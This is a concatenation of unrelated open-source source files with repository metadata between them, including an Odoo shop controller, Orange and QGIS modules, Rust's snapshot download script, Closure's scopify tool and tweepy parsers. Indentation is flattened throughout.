def change_styles(self, id, style_id):
product_obj = request.registry.get('product.template')
product = product_obj.browse(request.cr, request.uid, id, context=request.context)
remove = []
active = False
for style in product.website_style_ids:
if style.id == style_id:
remove.append(style.id)
active = True
break
style = request.registry.get('product.style').browse(request.cr, request.uid, style_id, context=request.context)
if remove:
product.write({'website_style_ids': [(3, rid) for rid in remove]})
if not active:
product.write({'website_style_ids': [(4, style.id)]})
return not active
@http.route(['/shop/change_sequence'], type='json', auth="public")
def change_sequence(self, id, sequence):
product_obj = request.registry.get('product.template')
if sequence == "top":
product_obj.set_sequence_top(request.cr, request.uid, [id], context=request.context)
elif sequence == "bottom":
product_obj.set_sequence_bottom(request.cr, request.uid, [id], context=request.context)
elif sequence == "up":
product_obj.set_sequence_up(request.cr, request.uid, [id], context=request.context)
elif sequence == "down":
product_obj.set_sequence_down(request.cr, request.uid, [id], context=request.context)
@http.route(['/shop/change_size'], type='json', auth="public")
def change_size(self, id, x, y):
product_obj = request.registry.get('product.template')
product = product_obj.browse(request.cr, request.uid, id, context=request.context)
return product.write({'website_size_x': x, 'website_size_y': y})
def order_lines_2_google_api(self, order_lines):
""" Transforms a list of order lines into a dict for google analytics """
ret = []
for line in order_lines:
product = line.product_id
ret.append({
'id': line.order_id and line.order_id.id,
'sku': product.ean13 or product.id,
'name': product.name or '-',
'category': product.categ_id and product.categ_id.name or '-',
'price': line.price_unit,
'quantity': line.product_uom_qty,
})
return ret
def order_2_return_dict(self, order):
""" Returns the tracking_cart dict of the order for Google analytics basically defined to be inherited """
return {
'transaction': {
'id': order.id,
'affiliation': order.company_id.name,
'revenue': order.amount_total,
'tax': order.amount_tax,
'currency': order.currency_id.name
},
'lines': self.order_lines_2_google_api(order.order_line)
}
@http.route(['/shop/tracking_last_order'], type='json', auth="public")
def tracking_cart(self, **post):
""" return data about order in JSON needed for google analytics"""
cr, context = request.cr, request.context
ret = {}
sale_order_id = request.session.get('sale_last_order_id')
if sale_order_id:
order = request.registry['sale.order'].browse(cr, SUPERUSER_ID, sale_order_id, context=context)
ret = self.order_2_return_dict(order)
return ret
@http.route(['/shop/get_unit_price'], type='json', auth="public", methods=['POST'], website=True)
def get_unit_price(self, product_ids, add_qty, use_order_pricelist=False, **kw):
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
products = pool['product.product'].browse(cr, uid, product_ids, context=context)
partner = pool['res.users'].browse(cr, uid, uid, context=context).partner_id
if use_order_pricelist:
pricelist_id = request.session.get('sale_order_code_pricelist_id') or partner.property_product_pricelist.id
else:
pricelist_id = partner.property_product_pricelist.id
prices = pool['product.pricelist'].price_rule_get_multi(cr, uid, [], [(product, add_qty, partner) for product in products], context=context)
return {product_id: prices[product_id][pricelist_id][0] for product_id in product_ids}
# vim:expandtab:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
yzl0083/orange
|
Orange/OrangeCanvas/canvas/tests/test_layout.py
|
13
|
2566
|
import time
from PyQt4.QtGui import QGraphicsView, QPainter, QPainterPath
from ...gui.test import QAppTestCase
from ..layout import AnchorLayout
from ..scene import CanvasScene
from ..items import NodeItem, LinkItem
class TestAnchorLayout(QAppTestCase):
def setUp(self):
QAppTestCase.setUp(self)
self.scene = CanvasScene()
self.view = QGraphicsView(self.scene)
self.view.setRenderHint(QPainter.Antialiasing)
self.view.show()
self.view.resize(600, 400)
def test_layout(self):
file_desc, disc_desc, bayes_desc = self.widget_desc()
file_item = NodeItem()
file_item.setWidgetDescription(file_desc)
file_item.setPos(0, 150)
self.scene.add_node_item(file_item)
bayes_item = NodeItem()
bayes_item.setWidgetDescription(bayes_desc)
bayes_item.setPos(200, 0)
self.scene.add_node_item(bayes_item)
disc_item = NodeItem()
disc_item.setWidgetDescription(disc_desc)
disc_item.setPos(200, 300)
self.scene.add_node_item(disc_item)
link = LinkItem()
link.setSourceItem(file_item)
link.setSinkItem(disc_item)
self.scene.add_link_item(link)
link = LinkItem()
link.setSourceItem(file_item)
link.setSinkItem(bayes_item)
self.scene.add_link_item(link)
layout = AnchorLayout()
self.scene.addItem(layout)
self.scene.set_anchor_layout(layout)
layout.invalidateNode(file_item)
layout.activate()
p1, p2 = file_item.outputAnchorItem.anchorPositions()
self.assertTrue(p1 > p2)
self.scene.node_item_position_changed.connect(layout.invalidateNode)
path = QPainterPath()
path.addEllipse(125, 0, 50, 300)
def advance():
t = time.clock()
bayes_item.setPos(path.pointAtPercent(t % 1.0))
disc_item.setPos(path.pointAtPercent((t + 0.5) % 1.0))
self.singleShot(20, advance)
advance()
self.app.exec_()
def widget_desc(self):
from ...registry.tests import small_testing_registry
reg = small_testing_registry()
file_desc = reg.widget(
"Orange.OrangeWidgets.Data.OWFile.OWFile"
)
discretize_desc = reg.widget(
"Orange.OrangeWidgets.Data.OWDiscretize.OWDiscretize"
)
bayes_desc = reg.widget(
"Orange.OrangeWidgets.Classify.OWNaiveBayes.OWNaiveBayes"
)
return file_desc, discretize_desc, bayes_desc
|
gpl-3.0
|
blueboxgroup/nova
|
nova/api/openstack/compute/schemas/v3/multinic.py
|
90
|
1571
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.validation import parameter_types
add_fixed_ip = {
'type': 'object',
'properties': {
'addFixedIp': {
'type': 'object',
'properties': {
# The maxLength is from the column 'uuid' of the
# table 'networks'
'networkId': {
'type': ['string', 'number'],
'minLength': 1, 'maxLength': 36,
},
},
'required': ['networkId'],
'additionalProperties': False,
},
},
'required': ['addFixedIp'],
'additionalProperties': False,
}
remove_fixed_ip = {
'type': 'object',
'properties': {
'removeFixedIp': {
'type': 'object',
'properties': {
'address': parameter_types.ip_address
},
'required': ['address'],
'additionalProperties': False,
},
},
'required': ['removeFixedIp'],
'additionalProperties': False,
}
|
apache-2.0
|
jostmey/MaxSnippetModel
|
dataplumbing_synthetic_data.py
|
1
|
2627
|
#########################################################################################
# Author: Jared L. Ostmeyer
# Date Started: 2016-07-26
# Environment: Python3
# License: See LICENSE
# Purpose: Generate synthetic dataset and create interfaces for piping the data to the model.
# Note: Overwrite "dataplumbing.py" with this file to use synthetic data.
##########################################################################################
import numpy as np
import lib_paths
import atchley_factors as vector_representation
def load_repertoires(data_dir):
return None
def process_repertoires(repertoires, snip_size=6):
# NOTE:
#
# This script creates a set of random of snippets (k-mers) for each sample.
# If this were real data from immune receptor sequences, you would take each
# CDR3 sequence in a sample, cut it up into every possible snippet (k-mer),
# and use those snippets (see EXAMPLE below). The snippet count would be the total number of
# times the snippet appeared in all of the CDR3 sequences from a sample.
#
# EXAMPLE:
#
# Assume this is your CDR3:
# ACTRGHKCILR
# The snippets are:
# ACTRGH
# CTRGH
# TRGHKC
# RGHKCI
# GHKCIL
# HKCILR
# This must be done for every CDR3 in the sample. After conveting the snippets
# into a vector representation (Atchley factors), the values are stored in "xs".
# Data dimensions
#
num_samples = 20
num_snips_per_sample = 300
snip_size = 6
num_features = snip_size*vector_representation.length
# Data variables
#
xs = np.zeros((num_samples, num_snips_per_sample, num_features), dtype=np.float32) # Features
cs = np.zeros((num_samples, num_snips_per_sample), dtype=np.float32) # Snippet count
ys = np.zeros((num_samples), dtype=np.float32) # Labels
# Generate random snippets
#
aa_list = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']
for i in range(num_samples):
N = np.random.randint(round(num_snips_per_sample/2))+round(num_snips_per_sample/2)-1
for j in range(N):
snip = ''
for k in range(snip_size):
index = np.random.randint(len(aa_list))
snip += aa_list[index]
xs[i,j,:] = vector_representation.features(snip)
cs[i,j] = 1.0
# Place needle in some samples and give those samples a positive diagnosis
#
needle = 'ARKIHG'
for i in range(round(num_samples/2)):
ys[i] = 1.0
xs[i,0,:] = vector_representation.features(needle)
return xs, cs, ys
|
bsd-3-clause
|
D4wN/brickv
|
src/brickv/plugin_system/plugins/red/program_page_csharp.py
|
1
|
9064
|
# -*- coding: utf-8 -*-
"""
RED Plugin
Copyright (C) 2014 Olaf Lüke <[email protected]>
Copyright (C) 2014-2015 Matthias Bolte <[email protected]>
program_page_csharp.py: Program Wizard C# Page
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public
License along with this program; if not, write to the
Free Software Foundation, Inc., 59 Temple Place - Suite 330,
Boston, MA 02111-1307, USA.
"""
from brickv.plugin_system.plugins.red.program_page import ProgramPage
from brickv.plugin_system.plugins.red.program_utils import *
from brickv.plugin_system.plugins.red.ui_program_page_csharp import Ui_ProgramPageCSharp
from brickv.plugin_system.plugins.red.script_manager import check_script_result
def get_mono_versions(script_manager, callback):
def cb_versions(result):
okay, _ = check_script_result(result)
if okay:
try:
version = result.stdout.split('\n')[0].split(' ')[4]
callback([ExecutableVersion('/usr/bin/mono', version)])
return
except:
pass
# Could not get versions, we assume that some version of mono 3.2 is installed
callback([ExecutableVersion('/usr/bin/mono', '3.2')])
script_manager.execute_script('mono_versions', cb_versions)
class ProgramPageCSharp(ProgramPage, Ui_ProgramPageCSharp):
def __init__(self, title_prefix=''):
ProgramPage.__init__(self)
self.setupUi(self)
self.language = Constants.LANGUAGE_CSHARP
self.setTitle('{0}{1} Configuration'.format(title_prefix, Constants.language_display_names[self.language]))
self.registerField('csharp.version', self.combo_version)
self.registerField('csharp.start_mode', self.combo_start_mode)
self.registerField('csharp.executable', self.combo_executable, 'currentText')
self.registerField('csharp.working_directory', self.combo_working_directory, 'currentText')
self.combo_start_mode.currentIndexChanged.connect(self.update_ui_state)
self.combo_start_mode.currentIndexChanged.connect(self.completeChanged.emit)
self.check_show_advanced_options.stateChanged.connect(self.update_ui_state)
self.label_spacer.setText('')
self.combo_executable_selector = MandatoryTypedFileSelector(self,
self.label_executable,
self.combo_executable,
self.label_executable_type,
self.combo_executable_type,
self.label_executable_help)
self.combo_working_directory_selector = MandatoryDirectorySelector(self,
self.label_working_directory,
self.combo_working_directory)
self.option_list_editor = ListWidgetEditor(self.label_options,
self.list_options,
self.label_options_help,
self.button_add_option,
self.button_remove_option,
self.button_up_option,
self.button_down_option,
'<new Mono option {0}>')
# overrides QWizardPage.initializePage
def initializePage(self):
self.set_formatted_sub_title(u'Specify how the {language} program [{name}] should be executed.')
self.update_combo_version('mono', self.combo_version)
self.combo_start_mode.setCurrentIndex(Constants.DEFAULT_CSHARP_START_MODE)
self.combo_executable_selector.reset()
self.check_show_advanced_options.setChecked(False)
self.combo_working_directory_selector.reset()
self.option_list_editor.reset()
# if a program exists then this page is used in an edit wizard
program = self.wizard().program
if program != None:
# start mode
start_mode_api_name = program.cast_custom_option_value('csharp.start_mode', unicode, '<unknown>')
start_mode = Constants.get_csharp_start_mode(start_mode_api_name)
self.combo_start_mode.setCurrentIndex(start_mode)
# executable
self.combo_executable_selector.set_current_text(program.cast_custom_option_value('csharp.executable', unicode, ''))
# working directory
self.combo_working_directory_selector.set_current_text(program.working_directory)
# options
self.option_list_editor.clear()
for option in program.cast_custom_option_value_list('csharp.options', unicode, []):
self.option_list_editor.add_item(option)
self.update_ui_state()
# overrides QWizardPage.isComplete
def isComplete(self):
executable = self.get_executable()
start_mode = self.get_field('csharp.start_mode')
if len(executable) == 0:
return False
if start_mode == Constants.CSHARP_START_MODE_EXECUTABLE and \
not self.combo_executable_selector.complete:
return False
return self.combo_working_directory_selector.complete and ProgramPage.isComplete(self)
# overrides ProgramPage.update_ui_state
def update_ui_state(self):
start_mode = self.get_field('csharp.start_mode')
start_mode_executable = start_mode == Constants.CSHARP_START_MODE_EXECUTABLE
show_advanced_options = self.check_show_advanced_options.isChecked()
self.label_executable.setVisible(start_mode_executable)
self.label_executable_type.setVisible(start_mode_executable)
self.combo_executable.setVisible(start_mode_executable)
self.combo_executable_type.setVisible(start_mode_executable)
self.label_executable_help.setVisible(start_mode_executable)
self.combo_working_directory_selector.set_visible(show_advanced_options)
self.option_list_editor.set_visible(show_advanced_options)
self.label_spacer.setVisible(not show_advanced_options)
self.option_list_editor.update_ui_state()
def get_executable(self):
return self.combo_version.itemData(self.get_field('csharp.version'))
def get_html_summary(self):
version = self.get_field('csharp.version')
start_mode = self.get_field('csharp.start_mode')
executable = self.get_field('csharp.executable')
working_directory = self.get_field('csharp.working_directory')
options = ' '.join(self.option_list_editor.get_items())
html = u'Mono Version: {0}<br/>'.format(Qt.escape(self.combo_version.itemText(version)))
html += u'Start Mode: {0}<br/>'.format(Qt.escape(Constants.csharp_start_mode_display_names[start_mode]))
if start_mode == Constants.CSHARP_START_MODE_EXECUTABLE:
html += u'Executable: {0}<br/>'.format(Qt.escape(executable))
html += u'Working Directory: {0}<br/>'.format(Qt.escape(working_directory))
html += u'Mono Options: {0}<br/>'.format(Qt.escape(options))
return html
def get_custom_options(self):
return {
'csharp.start_mode': Constants.csharp_start_mode_api_names[self.get_field('csharp.start_mode')],
'csharp.executable': self.get_field('csharp.executable'),
'csharp.options': self.option_list_editor.get_items()
}
def get_command(self):
executable = self.get_executable()
arguments = self.option_list_editor.get_items()
environment = []
start_mode = self.get_field('csharp.start_mode')
if start_mode == Constants.CSHARP_START_MODE_EXECUTABLE:
arguments.append(self.get_field('csharp.executable'))
working_directory = self.get_field('csharp.working_directory')
return executable, arguments, environment, working_directory
def apply_program_changes(self):
self.apply_program_custom_options_and_command_changes()
|
gpl-2.0
|
JingJunYin/tensorflow
|
tensorflow/contrib/keras/api/keras/utils/__init__.py
|
51
|
2105
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras._impl.keras.utils.data_utils import GeneratorEnqueuer
from tensorflow.python.keras._impl.keras.utils.data_utils import get_file
from tensorflow.python.keras._impl.keras.utils.data_utils import Sequence
from tensorflow.python.keras._impl.keras.utils.data_utils import SequenceEnqueuer
from tensorflow.python.keras._impl.keras.utils.generic_utils import custom_object_scope
from tensorflow.python.keras._impl.keras.utils.generic_utils import CustomObjectScope
from tensorflow.python.keras._impl.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras._impl.keras.utils.generic_utils import get_custom_objects
from tensorflow.python.keras._impl.keras.utils.generic_utils import Progbar
from tensorflow.python.keras._impl.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.keras._impl.keras.utils.io_utils import HDF5Matrix
from tensorflow.python.keras._impl.keras.utils.layer_utils import convert_all_kernels_in_model
from tensorflow.python.keras._impl.keras.utils.np_utils import normalize
from tensorflow.python.keras._impl.keras.utils.np_utils import to_categorical
from tensorflow.python.keras._impl.keras.utils.vis_utils import plot_model
del absolute_import
del division
del print_function
|
apache-2.0
|
gioman/QGIS
|
python/plugins/processing/algs/gdal/roughness.py
|
1
|
2919
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
roughness.py
---------------------
Date : October 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import str
__author__ = 'Alexander Bruy'
__date__ = 'October 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterNumber
from processing.core.outputs import OutputRaster
from processing.algs.gdal.GdalUtils import GdalUtils
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class roughness(GdalAlgorithm):
INPUT = 'INPUT'
BAND = 'BAND'
COMPUTE_EDGES = 'COMPUTE_EDGES'
OUTPUT = 'OUTPUT'
def group(self):
return self.tr('Raster analysis')
def name(self):
return 'roughness'
def displayName(self):
return self.tr('Roughness')
def defineCharacteristics(self):
self.addParameter(ParameterRaster(self.INPUT, self.tr('Input layer')))
self.addParameter(ParameterNumber(self.BAND,
self.tr('Band number'), 1, 99, 1))
self.addParameter(ParameterBoolean(self.COMPUTE_EDGES,
self.tr('Compute edges'), False))
self.addOutput(OutputRaster(self.OUTPUT, self.tr('Roughness')))
def getConsoleCommands(self):
arguments = ['roughness']
arguments.append(str(self.getParameterValue(self.INPUT)))
output = str(self.getOutputValue(self.OUTPUT))
arguments.append(output)
arguments.append('-of')
arguments.append(GdalUtils.getFormatShortNameFromFilename(output))
arguments.append('-b')
arguments.append(str(self.getParameterValue(self.BAND)))
if self.getParameterValue(self.COMPUTE_EDGES):
arguments.append('-compute_edges')
return ['gdaldem', GdalUtils.escapeAndJoin(arguments)]
|
gpl-2.0
|
miniupnp/rust
|
src/etc/snapshot.py
|
37
|
8006
|
# Copyright 2011-2015 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
import re
import os
import sys
import glob
import tarfile
import shutil
import subprocess
import distutils.spawn
try:
import hashlib
sha_func = hashlib.sha1
except ImportError:
import sha
sha_func = sha.new
def scrub(b):
if sys.version_info >= (3,) and type(b) == bytes:
return b.decode('ascii')
else:
return b
src_dir = scrub(os.getenv("CFG_SRC_DIR"))
if not src_dir:
raise Exception("missing env var CFG_SRC_DIR")
snapshotfile = os.path.join(src_dir, "src", "snapshots.txt")
download_url_base = "https://static.rust-lang.org/stage0-snapshots"
download_dir_base = "dl"
download_unpack_base = os.path.join(download_dir_base, "unpack")
snapshot_files = {
"linux": ["bin/rustc"],
"macos": ["bin/rustc"],
"winnt": ["bin/rustc.exe"],
"freebsd": ["bin/rustc"],
"dragonfly": ["bin/rustc"],
"bitrig": ["bin/rustc"],
"openbsd": ["bin/rustc"],
}
winnt_runtime_deps_32 = ["libgcc_s_dw2-1.dll", "libstdc++-6.dll"]
winnt_runtime_deps_64 = ["libgcc_s_seh-1.dll", "libstdc++-6.dll"]
def parse_line(n, line):
global snapshotfile
if re.match(r"\s*$", line):
return None
if re.match(r"^T\s*$", line):
return None
match = re.match(r"\s+([\w_-]+) ([a-fA-F\d]{40})\s*$", line)
if match:
return {"type": "file",
"platform": match.group(1),
"hash": match.group(2).lower()}
match = re.match(r"([ST]) (\d{4}-\d{2}-\d{2}) ([a-fA-F\d]+)\s*$", line)
if not match:
raise Exception("%s:%d:E syntax error: " % (snapshotfile, n))
return {"type": "snapshot",
"date": match.group(2),
"rev": match.group(3)}
def partial_snapshot_name(date, rev, platform):
return ("rust-stage0-%s-%s-%s.tar.bz2" %
(date, rev, platform))
def full_snapshot_name(date, rev, platform, hsh):
return ("rust-stage0-%s-%s-%s-%s.tar.bz2" %
(date, rev, platform, hsh))
def get_kernel(triple):
t = triple.split('-')
if len(t) == 2:
os_name = t[1]
else:
os_name = t[2]
if os_name == "windows":
return "winnt"
if os_name == "darwin":
return "macos"
if os_name == "freebsd":
return "freebsd"
if os_name == "dragonfly":
return "dragonfly"
if os_name == "bitrig":
return "bitrig"
if os_name == "openbsd":
return "openbsd"
return "linux"
def get_cpu(triple):
arch = triple.split('-')[0]
if arch == "i686":
return "i386"
return arch
def get_platform(triple):
return "%s-%s" % (get_kernel(triple), get_cpu(triple))
def cmd_out(cmdline):
p = subprocess.Popen(cmdline, stdout=subprocess.PIPE)
return scrub(p.communicate()[0].strip())
def local_rev_info(field):
return cmd_out(["git", "--git-dir=" + os.path.join(src_dir, ".git"),
"log", "-n", "1",
"--format=%%%s" % field, "HEAD"])
def local_rev_full_sha():
return local_rev_info("H").split()[0]
def local_rev_short_sha():
return local_rev_info("h").split()[0]
def local_rev_committer_date():
return local_rev_info("ci")
def get_url_to_file(u, f):
# no security issue, just to stop partial download leaving a stale file
tmpf = f + '.tmp'
returncode = -1
if distutils.spawn.find_executable("curl"):
returncode = subprocess.call(["curl", "-o", tmpf, u])
elif distutils.spawn.find_executable("wget"):
returncode = subprocess.call(["wget", "-O", tmpf, u])
if returncode != 0:
try:
os.unlink(tmpf)
except OSError:
pass
raise Exception("failed to fetch url")
os.rename(tmpf, f)
def snap_filename_hash_part(snap):
match = re.match(r".*([a-fA-F\d]{40}).tar.bz2$", snap)
if not match:
raise Exception("unable to find hash in filename: " + snap)
return match.group(1)
def hash_file(x):
h = sha_func()
h.update(open(x, "rb").read())
return scrub(h.hexdigest())
def get_winnt_runtime_deps(platform):
"""Returns a list of paths of Rust's system runtime dependencies"""
if platform == "winnt-x86_64":
deps = winnt_runtime_deps_64
else:
deps = winnt_runtime_deps_32
runtime_deps = []
path_dirs = os.environ["PATH"].split(os.pathsep)
for name in deps:
for dir in path_dirs:
filepath = os.path.join(dir, name)
if os.path.isfile(filepath):
runtime_deps.append(filepath)
break
else:
raise Exception("Could not find runtime dependency: %s" % name)
return runtime_deps
def make_snapshot(stage, triple):
kernel = get_kernel(triple)
platform = get_platform(triple)
rev = local_rev_short_sha()
date = local_rev_committer_date().split()[0]
file0 = partial_snapshot_name(date, rev, platform)
def in_tar_name(fn):
cs = re.split(r"[\\/]", fn)
if len(cs) >= 2:
return os.sep.join(cs[-2:])
tar = tarfile.open(file0, "w:bz2")
for name in snapshot_files[kernel]:
dir = stage
if stage == "stage1" and re.match(r"^lib/(lib)?std.*", name):
dir = "stage0"
fn_glob = os.path.join(triple, dir, name)
matches = glob.glob(fn_glob)
if not matches:
raise Exception("Not found file with name like " + fn_glob)
if len(matches) == 1:
tar.add(matches[0], "rust-stage0/" + in_tar_name(matches[0]))
else:
raise Exception("Found stale files: \n %s\n"
"Please make a clean build." % "\n ".join(matches))
if kernel == "winnt":
for path in get_winnt_runtime_deps(platform):
tar.add(path, "rust-stage0/bin/" + os.path.basename(path))
tar.add(os.path.join(os.path.dirname(__file__), "third-party"),
"rust-stage0/bin/third-party")
tar.close()
h = hash_file(file0)
file1 = full_snapshot_name(date, rev, platform, h)
shutil.move(file0, file1)
return file1
def curr_snapshot_rev():
i = 0
found_snap = False
date = None
rev = None
f = open(snapshotfile)
for line in f.readlines():
i += 1
parsed = parse_line(i, line)
if not parsed:
continue
if parsed["type"] == "snapshot":
date = parsed["date"]
rev = parsed["rev"]
found_snap = True
break
if not found_snap:
raise Exception("no snapshot entries in file")
return (date, rev)
def determine_curr_snapshot(triple):
i = 0
platform = get_platform(triple)
found_file = False
found_snap = False
hsh = None
date = None
rev = None
f = open(snapshotfile)
for line in f.readlines():
i += 1
parsed = parse_line(i, line)
if not parsed:
continue
if found_snap and parsed["type"] == "file":
if parsed["platform"] == platform:
hsh = parsed["hash"]
found_file = True
break
elif parsed["type"] == "snapshot":
date = parsed["date"]
rev = parsed["rev"]
found_snap = True
if not found_snap:
raise Exception("no snapshot entries in file")
if not found_file:
raise Exception("no snapshot file found for platform %s, rev %s" %
(platform, rev))
return full_snapshot_name(date, rev, platform, hsh)
|
apache-2.0
|
endlessm/chromium-browser
|
third_party/google_input_tools/third_party/closure_library/closure/bin/scopify.py
|
329
|
6785
|
#!/usr/bin/python
#
# Copyright 2010 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Automatically converts codebases over to goog.scope.
Usage:
cd path/to/my/dir;
../../../../javascript/closure/bin/scopify.py
Scans every file in this directory, recursively. Looks for existing
goog.scope calls, and goog.require'd symbols. If it makes sense to
generate a goog.scope call for the file, then we will do so, and
try to auto-generate some aliases based on the goog.require'd symbols.
Known Issues:
When a file is goog.scope'd, the file contents will be indented +2.
This may put some lines over 80 chars. These will need to be fixed manually.
We will only try to create aliases for capitalized names. We do not check
to see if those names will conflict with any existing locals.
This creates merge conflicts for every line of every outstanding change.
If you intend to run this on your codebase, make sure your team members
know. Better yet, send them this script so that they can scopify their
outstanding changes and "accept theirs".
When an alias is "captured", it can no longer be stubbed out for testing.
Run your tests.
"""
__author__ = '[email protected] (Nick Santos)'
import os.path
import re
import sys
REQUIRES_RE = re.compile(r"goog.require\('([^']*)'\)")
# Edit this manually if you want something to "always" be aliased.
# TODO(nicksantos): Add a flag for this.
DEFAULT_ALIASES = {}
def Transform(lines):
"""Converts the contents of a file into javascript that uses goog.scope.
Arguments:
lines: A list of strings, corresponding to each line of the file.
Returns:
A new list of strings, or None if the file was not modified.
"""
requires = []
# Do an initial scan to be sure that this file can be processed.
for line in lines:
# Skip this file if it has already been scopified.
if line.find('goog.scope') != -1:
return None
# If there are any global vars or functions, then we also have
# to skip the whole file. We might be able to deal with this
# more elegantly.
if line.find('var ') == 0 or line.find('function ') == 0:
return None
for match in REQUIRES_RE.finditer(line):
requires.append(match.group(1))
if len(requires) == 0:
return None
# Backwards-sort the requires, so that when one is a substring of another,
# we match the longer one first.
for val in DEFAULT_ALIASES.values():
if requires.count(val) == 0:
requires.append(val)
requires.sort()
requires.reverse()
# Generate a map of requires to their aliases
aliases_to_globals = DEFAULT_ALIASES.copy()
for req in requires:
index = req.rfind('.')
if index == -1:
alias = req
else:
alias = req[(index + 1):]
# Don't scopify lowercase namespaces, because they may conflict with
# local variables.
if alias[0].isupper():
aliases_to_globals[alias] = req
aliases_to_matchers = {}
globals_to_aliases = {}
for alias, symbol in aliases_to_globals.items():
globals_to_aliases[symbol] = alias
aliases_to_matchers[alias] = re.compile('\\b%s\\b' % symbol)
# Insert a goog.scope that aliases all required symbols.
result = []
START = 0
SEEN_REQUIRES = 1
IN_SCOPE = 2
mode = START
aliases_used = set()
insertion_index = None
num_blank_lines = 0
for line in lines:
if mode == START:
result.append(line)
if re.search(REQUIRES_RE, line):
mode = SEEN_REQUIRES
elif mode == SEEN_REQUIRES:
if (line and
not re.search(REQUIRES_RE, line) and
not line.isspace()):
# There should be two blank lines before goog.scope
result += ['\n'] * 2
result.append('goog.scope(function() {\n')
insertion_index = len(result)
result += ['\n'] * num_blank_lines
mode = IN_SCOPE
elif line.isspace():
# Keep track of the number of blank lines before each block of code so
# that we can move them after the goog.scope line if necessary.
num_blank_lines += 1
else:
# Print the blank lines we saw before this code block
result += ['\n'] * num_blank_lines
num_blank_lines = 0
result.append(line)
if mode == IN_SCOPE:
for symbol in requires:
if not symbol in globals_to_aliases:
continue
alias = globals_to_aliases[symbol]
matcher = aliases_to_matchers[alias]
for match in matcher.finditer(line):
# Check to make sure we're not in a string.
# We do this by being as conservative as possible:
# if there are any quote or double quote characters
# before the symbol on this line, then bail out.
before_symbol = line[:match.start(0)]
if before_symbol.count('"') > 0 or before_symbol.count("'") > 0:
continue
line = line.replace(match.group(0), alias)
aliases_used.add(alias)
if line.isspace():
# Truncate all-whitespace lines
result.append('\n')
else:
result.append(line)
if len(aliases_used):
aliases_used = [alias for alias in aliases_used]
aliases_used.sort()
aliases_used.reverse()
for alias in aliases_used:
symbol = aliases_to_globals[alias]
result.insert(insertion_index,
'var %s = %s;\n' % (alias, symbol))
result.append('}); // goog.scope\n')
return result
else:
return None
def TransformFileAt(path):
"""Converts a file into javascript that uses goog.scope.
Arguments:
path: A path to a file.
"""
f = open(path)
lines = Transform(f.readlines())
if lines:
f = open(path, 'w')
for l in lines:
f.write(l)
f.close()
if __name__ == '__main__':
args = sys.argv[1:]
if not len(args):
args = '.'
for file_name in args:
if os.path.isdir(file_name):
for root, dirs, files in os.walk(file_name):
for name in files:
if name.endswith('.js') and \
not os.path.islink(os.path.join(root, name)):
TransformFileAt(os.path.join(root, name))
else:
if file_name.endswith('.js') and \
not os.path.islink(file_name):
TransformFileAt(file_name)
|
bsd-3-clause
|
stone5495/NewsBlur
|
vendor/tweepy/parsers.py
|
74
|
2622
|
# Tweepy
# Copyright 2009-2010 Joshua Roesslein
# See LICENSE for details.
from tweepy.models import ModelFactory
from tweepy.utils import import_simplejson
from tweepy.error import TweepError
class Parser(object):
def parse(self, method, payload):
"""
Parse the response payload and return the result.
Returns a tuple that contains the result data and the cursors
(or None if not present).
"""
raise NotImplementedError
def parse_error(self, payload):
"""
Parse the error message from payload.
If unable to parse the message, throw an exception
and default error message will be used.
"""
raise NotImplementedError
class RawParser(Parser):
def __init__(self):
pass
def parse(self, method, payload):
return payload
def parse_error(self, payload):
return payload
class JSONParser(Parser):
payload_format = 'json'
def __init__(self):
self.json_lib = import_simplejson()
